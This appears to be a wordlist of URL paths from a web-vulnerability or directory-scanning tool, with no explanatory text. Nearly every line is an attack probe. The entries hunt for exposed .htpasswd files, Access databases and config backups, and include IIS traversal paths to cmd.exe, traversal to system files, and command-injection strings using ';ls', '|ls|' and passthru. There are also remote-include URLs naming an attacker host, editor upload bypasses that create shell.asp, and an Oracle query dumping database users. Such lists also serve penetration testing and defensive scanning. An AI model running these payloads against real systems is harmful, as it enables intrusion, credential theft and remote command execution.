data/SiteWeaver6.5.asa
data/SiteWeaver6.5.asp
data/SiteWeaver6.5.mdb
data/SiteWeaver6.6.asa
data/SiteWeaver6.6.asp
data/SiteWeaver6.6.mdb
data/SiteWeaver6.7.asa
data/SiteWeaver6.7.asp
data/SiteWeaver6.7.mdb
data/users.db.asp
data/users.db.aspx
data/users.db.jsp
data/users.db.php
database.inc.php
database/%23%23%23fdkjgzschool.V2009%23.asp
DataBase/%236.1.mdb
database/%236.5.mdb
Database/%23TZIMS_Ver6.1.mdb
database/.dbusers.db
database/.htpass-4.new
database/.htpasswd.aknk
database/.htpasswd.nten
database/.htpasswd.slez
database/dmr/.htpasswd.ass
database/PowerEasy4.mdb/database/%23newasp.mdb
database/SiteWeaver6.5.asa
database/SiteWeaver6.5.asp
database/SiteWeaver6.5.mdb
database/SiteWeaver6.6.asa
database/SiteWeaver6.6.asp
database/SiteWeaver6.6.mdb
database/SiteWeaver6.7.asa
database/SiteWeaver6.7.asp
database/SiteWeaver6.7.mdb
Database/SuperFTP.Cn.mdb
DataBases/###fdkjgzschool.V2009#.asp
DataBases/%23%23%23fdkjgzschool.V2009%23.asp
DataBases/%23%23%23fdkjgzschool.V2009%23.aspx
DataBases/%23%23%23fdkjgzschool.V2009%23.jsp
DataBases/%23%23%23fdkjgzschool.V2009%23.php
Db/Ok3w.Net_v5.0.ASP
dbconnect.asp.bak
dbconnect.asp.bk
dbconnect.aspx.bak
dbconnect.aspx.bk
dbconnect.inc.bak
dbconnect.inc.bk
dbconnect.jsp.bak
dbconnect.jsp.bk
dbconnect.php.bak
dbconnect.php.bk
deep/.htpass-4.new
deep/.htpasswd.aknk
deep/.htpasswd.nten
deep/.htpasswd.slez
deep/dmr/.htpasswd.ass
default.asp%3f.htr
default.asp%3f+.htr
default.asp.
default.asp.bak
default.asp^/default.asp;
default.asp+.htr
default.aspx%3f+.htr
default.aspx.
default.aspx.bak
default.aspx+.htr
default.jsp%3f+.htr
default.jsp.
default.jsp.bak
default.jsp+.htr
default.php%3f+.htr
default.php.
default.php.bak
default.php+.htr
default_1.asp.bak
default_1.aspx.bak
default_1.jsp.bak
default_1.php.bak
default1.asp.bak
default1.aspx.bak
default1.jsp.bak
default1.php.bak
default2.asp.bak
default2.aspx.bak
default2.jsp.bak
default2.php.bak
defines.php?WEBCHATPATH=anothersrvr_language_english.php
diy.asp^/diy.asp;
dm.asp.bak
dmr/.dbusers.db
dmr/.htpass-4.new
dmr/.htpasswd.aknk
dmr/.htpasswd.ass
dmr/.htpasswd.fat
dmr/.htpasswd.nten
dmr/.htpasswd.NTEN
dmr/.htpasswd.slez
dmr/.htpasswd.TERI
dmr/.htpasswddmr/.htpasswd
dmr/dmr/.htpasswd.ass
docs/showtemp.cfm?TYPE=JPEG&FILE=c:/boot.ini
domcfg.nsf/URLRedirect/?OpenForm.
downcode.com.txt
drowssap/.htpass-4.new
drowssap/.htpasswd.aknk
drowssap/.htpasswd.nten
drowssap/.htpasswd.slez
drowssap/dmr/.htpasswd.ass
Dvbbs8.0.0_Ac
eden/.htpass-4.new
eden/.htpasswd.aknk
eden/.htpasswd.nten
eden/.htpasswd.slez
eden/dmr/.htpasswd.ass
edit/admin_uploadfile.asp?id=14&dir=..
Edit/V2.80%E4%BF%AE%E6%AD%A3%E7%89%88%E8%AF%B4%E6%98%8E.txt
editor/admin_uploadfile.asp?id=14&dir=..
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2fhosts
epoch/.dbusers.db
epoch/.htpass-4.new
epoch/.htpasswd.aknk
epoch/.htpasswd.nten
epoch/.htpasswd.NTEN
epoch/.htpasswd.slez
epoch/dmr/.htpasswd.ass
epochp/.dbusers.db
epwd/.htpass-4.new
epwd/.htpasswd.aknk
epwd/.htpasswd.nten
epwd/.htpasswd.slez
epwd/dmr/.htpasswd.ass
error/HTTP_NOT_FOUND.html.var
ESYSManager/DataBase/EsysV3.0.mdb
everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
eweb/admin_uploadfile.asp?id=14&dir=..
ewebeditor/admin_uploadfile.asp?id=14&dir=..
ex/jsp/simple.jsp.
example.jsp..
exchange/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
exchange/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
exchange/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
ext.ini.%00.txt
fanclub/.htpass-4.new
fanclub/.htpasswd.aknk
fanclub/.htpasswd.nten
fanclub/.htpasswd.slez
fanclub/dmr/.htpasswd.ass
FCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.asp
FCKeditor/editor/filemanager/browser/default/browser.asp?Type=../&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.asp?Type=../&Connector=connectors/aspx/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.asp?Type=../&Connector=connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.asp?Type=../&Connector=connectors/php/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.asp?Type=all&Connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.asp?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=../&Connector=connectors/asp/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=../&Connector=connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=../&Connector=connectors/aspx/connector.aspxx
FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=../&Connector=connectors/php/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=all&Connector=connectors/asp/connector.aspx
fckeditor/editor/filemanager/browser/default/browser.aspx?Type=Image&Connector=connectors/asp/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/php/connector.php
fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=../&Connector=connectors/asp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=../&Connector=connectors/aspx/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=../&Connector=connectors/aspx/connector.jspx
FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=../&Connector=connectors/php/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.jsp?Type=Image&Connector=connectors/asp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.php?Type=../&Connector=connectors/asp/connector.php
FCKeditor/editor/filemanager/browser/default/browser.php?Type=../&Connector=connectors/aspx/connector.php
FCKeditor/editor/filemanager/browser/default/browser.php?Type=../&Connector=connectors/aspx/connector.phpx
FCKeditor/editor/filemanager/browser/default/browser.php?Type=../&Connector=connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.php?Type=all&Connector=connectors/asp/connector.php
fckeditor/editor/filemanager/browser/default/browser.php?Type=Image&Connector=connectors/asp/connector.php
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
flash/downfile.asp?url=jackie/../../conn.asp
flash/downfile.asp?url=uploadfile/../../conn.asp
foldoc/template.cgi?template.cgi
forum/include.php?gorumDir=anotherhost_with_group.php
forum/include/default_header.php?script_path=http:/host_with_-include-default_style.css
forums/avatar.php?img=../secret/connect.php
funciton.asp.bak
funciton.aspx.bak
funciton.jsp.bak
funciton.php.bak
function_foot_1.inc.php
garden/.htpass-4.new
garden/.htpasswd.aknk
garden/.htpasswd.nten
garden/.htpasswd.slez
garden/dmr/.htpasswd.ass
gateway/.htpass-4.new
gateway/.htpasswd.aknk
gateway/.htpasswd.nten
gateway/.htpasswd.slez
gateway/dmr/.htpasswd.ass
gay/members/private/.htpass-4.new
gay/members/private/.htpasswd.aknk
gay/members/private/.htpasswd.nten
gay/members/private/.htpasswd.slez
gay/members/private/dmr/.htpasswd.ass
getem/.htpass-4.new
getem/.htpasswd.aknk
getem/.htpasswd.nten
getem/.htpasswd.slez
getem/dmr/.htpasswd.ass
gh345dfg/.htpass-4.new
gh345dfg/.htpasswd.aknk
gh345dfg/.htpasswd.nten
gh345dfg/.htpasswd.slez
gh345dfg/dmr/.htpasswd.ass
global.asa%20.pl
global.asa%3f.htr
global.asa%3f.jsp
global.asa%3f+.htr
global.asa.1
global.asa.2
global.asa.bak
global.asa.bk
global.asa.old
global.asa+.htr
global.asa+.htr^/global.asa+.htr;
global.asax.cs
global.asp.1
global.asp.2
global.asp.bak
global.asp.bk
global.asp.old
global.asp+.htr
global.aspx.1
global.aspx.2
global.aspx.bak
global.aspx.bk
global.aspx.old
global.aspx+.htr
global.jsp.1
global.jsp.2
global.jsp.bak
global.jsp.bk
global.jsp.old
global.jsp+.htr
global.php%3f+.htr
global.php.1
global.php.2
global.php.bak
global.php.bk
global.php.old
global.php+.htr
guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
hit.php?url_hit=anotherhost_with_config.php
hshw/conn.inc.asp
ht/conn.asp.bak
htdata/.dbusers.db
htdata/access/.htpasswd.NTEN
htdata/access7/.htpasswd.NTEN
htdata/dmr/.htpasswd.nten
htdata/dmr/.htpasswd.NTEN
htdata/epoch/.htpasswd.NTEN
htdata/log/.htpasswd.NTEN
htdata/main/.htpasswd.NTEN
htdata/members/.htpasswd.NTEN
htdata/online/.htpasswd.NTEN
htdata/restricted/.htpasswd.NTEN
htdata/secure/.htpasswd.NTEN
htdata/vcafeeds/.htpasswd.NTEN
htdata/work/.htpasswd.NTEN
Htmledit/DateBase/%23ewebeditor2006@.mdb.asp
htpass/.htpass-4.new
htpass/.htpasswd.aknk
htpass/.htpasswd.nten
htpass/.htpasswd.slez
htpass/dmr/.htpasswd.ass
htpasswd/.htpass-4.new
htpasswd/.htpasswd.aknk
htpasswd/.htpasswd.nten
htpasswd/.htpasswd.slez
htpasswd/dmr/.htpasswd.ass
icast.txtdd.txt
iissamples/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
iissamples/exair/howitworks/codebrws.asp?source=/index.asp
iissamples/exair/howitworks/codebrws.asp?source=/login.asp
iissamples/exair/howitworks/codebrws.aspx?source=/index.aspx
iissamples/exair/howitworks/codebrws.aspx?source=/login.aspx
iissamples/exair/howitworks/codebrws.jsp?source=/index.jsp
iissamples/exair/howitworks/codebrws.jsp?source=/login.jsp
iissamples/exair/howitworks/codebrws.php?source=/index.php
iissamples/exair/howitworks/codebrws.php?source=/login.php
iissamples/exair/search/qfullhit.htw?ciwebhitsfile=/../../winnt/system32/config/system.log&cirestriction=none&cihilitetype=full
iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/sdk/asp/docs/codebrws.asp?source=/iissamples/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/docs/CodeBrws.asp
iissamples/sdk/asp/docs/codebrws.aspx?source=/iissamples/%c0%ae%c0%ae/default.aspx
iissamples/sdk/asp/docs/codebrws.jsp?source=/iissamples/%c0%ae%c0%ae/default.jsp
iissamples/sdk/asp/docs/codebrws.php?source=/iissamples/%c0%ae%c0%ae/default.php
inc.asp.bak
inc.aspx.bak
inc.jsp.bak
inc.php.bak
inc/common.load.php?prefix=myhost
inc/config.inc.asp
inc/conn.asp.bak
inc/conn.asp.bk
inc/conn.aspx.bak
inc/conn.aspx.bk
inc/conn.inc.asp
inc/conn.inc.bak
inc/conn.inc.bk
inc/conn.jsp.bak
inc/conn.jsp.bk
inc/conn.php.bak
inc/conn.php.bk
inc/counter.inc.bak
inc/counter.inc.bk
inc/dbconnect.asp.bak
inc/dbconnect.asp.bk
inc/dbconnect.aspx.bak
inc/dbconnect.aspx.bk
inc/dbconnect.inc.bak
inc/dbconnect.inc.bk
inc/dbconnect.jsp.bak
inc/dbconnect.jsp.bk
inc/dbconnect.php.bak
inc/dbconnect.php.bk
inc/upload.asp?picName=st999.asp
include/config.inc.php
include/conn.asp.bak
include/conn.asp.bk
include/conn.aspx.bak
include/conn.aspx.bk
include/conn.inc.asp
include/conn.inc.bak
include/conn.inc.bk
include/conn.jsp.bak
include/conn.jsp.bk
include/conn.php.bak
include/conn.php.bk
include/counter.inc.bak
include/counter.inc.bk
include/dbconnect.asp.bak
include/dbconnect.asp.bk
include/dbconnect.aspx.bak
include/dbconnect.aspx.bk
include/dbconnect.inc.bak
include/dbconnect.inc.bk
include/dbconnect.jsp.bak
include/dbconnect.jsp.bk
include/dbconnect.php.bak
include/dbconnect.php.bk
include/help.php?base=anotherserver_with_include_common.inc
include/msql.php?inc_dir=http:/www.atker.com&ext=txt
include/mssql7.php?inc_dir=http:/www.atker.com&ext=txt
include/mysql.php?inc_dir=http:/www.atker.com&ext=txt
include/oci8.php?inc_dir=http:/www.atker.com&ext=txt
include/postgres65.php?inc_dir=http:/www.atker.com&ext=txt
include/upload.asp?picName=st999.asp
includes/global.inc^/includes/global.inc
index.asp%2e..
index.asp%3f.asp
index.asp%3f.jsp
index.asp%3f+.htr
index.asp.
index.asp..
index.asp.asp
index.asp.bak
index.asp?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.asp+.htr
index.asp3.%5c../..%5cconf/httpd.conf
index.aspx%2e..
index.aspx%3f.aspx
index.aspx%3f+.htr
index.aspx.
index.aspx..
index.aspx.aspx
index.aspx.bak
index.aspx?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.aspx+.htr
index.html.bak
index.jsp%2e..
index.jsp%3f.jsp
index.jsp%3f+.htr
index.jsp.
index.jsp..
index.jsp.bak
index.jsp.jsp
index.jsp?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.JSP^/index.JSP;
index.jsp+.htr
index.php%2e..
index.php%3f.php
index.php%3f+.htr
index.php.
index.php..
index.php.bak
index.php.php
index.php?chemin=..%2f..%2f..%2f..%2f..%2f..%2f%2fetc
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php+.htr
index.php3.%5c../..%5cconf/httpd.conf
index.php3.%5c../..%5cconf/httpd.conf^/index.php3.%5c../..%5cconf/httpd.conf;
index.php3?vhosts=http:go.to
index1.asp.bak
index1.aspx.bak
index1.jsp.bak
index1.php.bak
ipchat.php?root_path=anotherhost_with_conf_global.php
Joekoe_CMS_4.0.mdb
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
library/editor/editor.php?root=myhost_library__editor__PropAcce_string.php
list.asp.bak
list.aspx.bak
list.jsp.bak
list.php.bak
live/.htpass-4.new
live/.htpasswd.aknk
live/.htpasswd.nten
live/.htpasswd.slez
live/dmr/.htpasswd.ass
log/.dbusers.db
log/.htpasswd.NTEN
login.asp%3f+.htr
login.asp%3F+.htr
login.asp.bak
login.asp.bk
login.asp?+.htr
login.aspx%3f+.htr
login.aspx.bak
login.aspx.bk
login.aspx?+.htr
login.jsp%3f+.htr
login.jsp.bak
login.jsp.bk
login.jsp?+.htr
login.jsp^/login.jsp
login.php%3f+.htr
login.php.bak
login.php.bk
login.php?+.htr
login.pl.bak
login.pl.bk
logs/.dbusers.db
logs/.htpass-4.new
logs/.htpasswd.aknk
logs/.htpasswd.nten
logs/.htpasswd.slez
logs/dmr/.htpasswd.ass
love/footer.yc.php
love/images/logo.gif.php
love/include/bbcode.art.inc.php
love/include/bbcode.inc.php
love/include/config.inc.php
love/include/footer.manage.php
love/include/footer.yc.php
love/include/header.manage.php
love/include/header.yc.php
love/include/session.inc.php
love/include/smilie.inc.php
love/login.inc.php
main.asp%3f.htr
main.asp.
main.asp.bak
main.asp+.htr
main.aspx%3f.htr
main.aspx.
main.aspx.bak
main.aspx+.htr
main.jsp%3f.htr
main.jsp.
main.jsp.bak
main.jsp+.htr
main.php%3f.htr
main.php.
main.php.bak
main.php+.htr
main/.htpasswd.NTEN
manage.asp.bak
manage.aspx.bak
manage.jsp.bak
manage.php.bak
manage/edit/admin_uploadfile.asp?id=14&dir=..
manage/editor/admin_uploadfile.asp?id=14&dir=..
manage/ewebeditor/admin_uploadfile.asp?id=14&dir=..
manage/FCKeditor/editor/filemanager/browser/default/browser.asp?Type=all&Connector=connectors/asp/connector.asp
manage/FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=all&Connector=connectors/asp/connector.aspx
manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
manage/FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
manage/FCKeditor/editor/filemanager/browser/default/browser.php?Type=all&Connector=connectors/asp/connector.php
manage/upload.asp?picName=st999.asp
manage/uploadPic.inc.asp
marines/.htpass-4.new
marines/.htpasswd.aknk
marines/.htpasswd.nten
marines/.htpasswd.slez
marines/dmr/.htpasswd.ass
master/.htpass-4.new
master/.htpasswd.aknk
master/.htpasswd.nten
master/.htpasswd.slez
master/dmr/.htpasswd.ass
mastergate/.dbusers.db
mastergate/.htpasswd.NTEN
mastergate/access/.htpasswd.NTEN
mastergate/access7/.htpasswd.NTEN
mastergate/content_areas/access7/.htpasswd.NTEN
mastergate/content_areas/log/.htpasswd.NTEN
mastergate/content_areas/vcafeeds/.htpasswd.NTEN
mastergate/dmr/.htpasswd.NTEN
mastergate/epoch/.htpasswd.NTEN
mastergate/log/.htpasswd.NTEN
mastergate/members/.htpasswd.NTEN
mastergate/online/.htpasswd.NTEN
mastergate/restricted/.htpasswd.NTEN
mastergate/secure/.htpasswd.NTEN
mastergate/vcafeeds/.htpasswd.NTEN
mastergate/work/.htpasswd.NTEN
mbr/.htpass-4.new
mbr/.htpasswd.aknk
mbr/.htpasswd.nten
mbr/.htpasswd.slez
mbr/dmr/.htpasswd.ass
member/.htpass-4.new
member/.htpasswd.aknk
member/.htpasswd.nten
member/.htpasswd.slez
member/dmr/.htpasswd.ass
Member/FileUpLoad.asp/eWebEditor/upload.asp
memberpro/.htpass-4.new
memberpro/.htpasswd.aknk
memberpro/.htpasswd.nten
memberpro/.htpasswd.slez
memberpro/dmr/.htpasswd.ass
members/%20%20pass%20ikuiku99:ikuiku%20%20pass%20by%20w.o.k
members/.htpass-4.new
members/.htpasswd.aknk
members/.htpasswd.nten
members/.htpasswd.NTEN
members/.htpasswd.slez
members/.passwd.db
members/.webpass_members.
members/cgi-bin/.htpass-4.new
members/cgi-bin/.htpasswd.aknk
members/cgi-bin/.htpasswd.nten
members/cgi-bin/.htpasswd.slez
members/cgi-bin/dmr/.htpasswd.ass
members/dmr/.htpasswd.ass
members/log/.htpass-4.new
members/log/.htpasswd.aknk
members/log/.htpasswd.nten
members/log/.htpasswd.slez
members/log/dmr/.htpasswd.ass
members/members/.htpass-4.new
members/members/.htpasswd.aknk
members/members/.htpasswd.nten
members/members/.htpasswd.slez
members/members/dmr/.htpasswd.ass
members/private/.htpass-4.new
members/private/.htpasswd.aknk
members/private/.htpasswd.nten
members/private/.htpasswd.slez
members/private/dmr/.htpasswd.ass
members/protected/.htpass-4.new
members/protected/.htpasswd.aknk
members/protected/.htpasswd.nten
members/protected/.htpasswd.slez
members/protected/dmr/.htpasswd.ass
members/users/.htpass-4.new
members/users/.htpasswd.aknk
members/users/.htpasswd.nten
members/users/.htpasswd.slez
members/users/dmr/.htpasswd.ass
memberscam/.htpass-4.new
memberscam/.htpasswd.aknk
memberscam/.htpasswd.nten
memberscam/.htpasswd.slez
memberscam/dmr/.htpasswd.ass
members-only/.htpass-4.new
members-only/.htpasswd.aknk
members-only/.htpasswd.nten
members-only/.htpasswd.slez
members-only/dmr/.htpasswd.ass
menu.asp.bak
menu.aspx.bak
menu.jsp.bak
menu.php.bak
modeles/haut.php?dirroot=http:/badhost_with_lang_lang.php&SESSION=.
modsecurity.php?inc_prefix=obox/htmlheader.php
modules/WebMail/mailattach.php?userfile=../../some.php&userfile_name=../attachments/file.txt&attachments=1
msadc/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
msadc/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
mypasswds/.htpass-4.new
mypasswds/.htpasswd.aknk
mypasswds/.htpasswd.nten
mypasswds/.htpasswd.slez
mypasswds/dmr/.htpasswd.ass
myServerEXEC-0.2/readme.txt
netbilling/.dbusers.db
netbilling/.htpass-4.new
netbilling/.htpasswd.aknk
netbilling/.htpasswd.nb
netbilling/.htpasswd.nb5
netbilling/.htpasswd.nb7
netbilling/.htpasswd.nten
netbilling/.htpasswd.slez
netbilling/dmr/.htpasswd.ass
netbilling/swingers/.htpasswd.nb
netget?sid=user&msg=300&file=/../../../filename.ext
network_query.asp?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
network_query.aspx?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
network_query.jsp?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
network_query.php?portnum=80&querytype=all&target=www.someserver.com%3bls+-l&submit=do+it
news/include/customize.php?l=http:/host/otherfile.php
newslogin.asp.
newslogin.aspx.
newslogin.htm.
newslogin.jsp.
newslogin.php.
newspass/.htpass-4.new
newspass/.htpasswd.aknk
newspass/.htpasswd.nten
newspass/.htpasswd.slez
newspass/dmr/.htpasswd.ass
Newuser?Image=../../database/rbsserv.mdb
nul..dbm
null.htw?ciwebhitsfile=/global.asa%20&cirestriction=none&cihilitetype=full
null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
null.htw?ciwebhitsfile=/global.asp%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/global.aspx%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/global.jsp%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/global.php%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/index.asp%20&cirestriction=none&cihilitetype=full
null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
null.htw?ciwebhitsfile=/index.aspx%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/index.jsp%20&cirestriction=none&cihilitetype=full
null.htw?ciwebhitsfile=/index.php%20&cirestriction=none&cihilitetype=full
NULL.printerHTTP/1.0rnrn
NULL.printerHTTP/1.0rnrn^/NULL.printerHTTP/1.0rnrn;
nx/common/cds/menu.inc.php?c_path=otherhost_with__common_lib_launch.inc.php
oblog4.60.mdb
online/.htpasswd.NTEN
oor/content_areas/access/.htpasswd.NTEN
oor/content_areas/access7/.htpasswd.NTEN
oor/content_areas/dmr/.htpasswd.NTEN
oor/content_areas/epoch/.htpasswd.NTEN
oor/content_areas/log/.htpasswd.NTEN
oor/content_areas/online/.htpasswd.NTEN
oor/content_areas/private/.htpasswd.NTEN
oor/content_areas/restricted/.htpasswd.NTEN
oor/content_areas/secure/.htpasswd.NTEN
oor/content_areas/vcafeeds/.htpasswd.NTEN
oor/content_areas/work/.htpasswd.NTEN
oordir/.htpass-4.new
oordir/.htpasswd.aknk
oordir/.htpasswd.nten
oordir/.htpasswd.slez
oordir/dmr/.htpasswd.ass
open.asp.bak
open.aspx.bak
open.jsp.bak
open.php.bak
opt/casp/admin/conf/hkey.current.user
page.cfm^/page.cfm;
pass/.htpass-4.new
pass/.htpasswd.aknk
pass/.htpasswd.nten
pass/.htpasswd.slez
pass/dmr/.htpasswd.ass
passes/.htpasswd.nkmd
passwords/.htpass-4.new
passwords/.htpasswd.aknk
passwords/.htpasswd.nten
passwords/.htpasswd.slez
passwords/dmr/.htpasswd.ass
phpgroupware/inc/phpgwapi/phpgw.inc.asp
phpgroupware/inc/phpgwapi/phpgw.inc.aspx
phpgroupware/inc/phpgwapi/phpgw.inc.jsp
phpgroupware/inc/phpgwapi/phpgw.inc.ph
phpgroupware/inc/phpgwapi/phpgw.inc.php
phpmyadmin/config.inc.asp
phpmyadmin/config.inc.aspx
phpmyadmin/config.inc.jsp
phpmyadmin/config.inc.php
phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK="".passthru('/bin/ls').""
phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=.passthru('/bin/ls').
phpMyAdmin/tbl_copy.php?strCopyTableOK="".passthru('/bin/ls').""
phpMyAdmin/tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
phpmyadmin/themes/darkblue_orange/layout.inc.asp
phpmyadmin/themes/darkblue_orange/layout.inc.aspx
phpmyadmin/themes/darkblue_orange/layout.inc.jsp
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpping/index.php?pingto=www.somewhere.org%20|%20dir
piay.791.1587.0
pics/.htpass-4.new
pics/.htpasswd.aknk
pics/.htpasswd.nten
pics/.htpasswd.slez
pics/dmr/.htpasswd.ass
play/25878094.flv%7Chttp:/www.02zz.cn/play/zhaoshang.flv
play/25878094.flv%7Chttp:www.02zz.cn/play/zhaoshang.flv
pls/admin_/help/..%255Cplsql.conf
pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users&p_max_rows=10
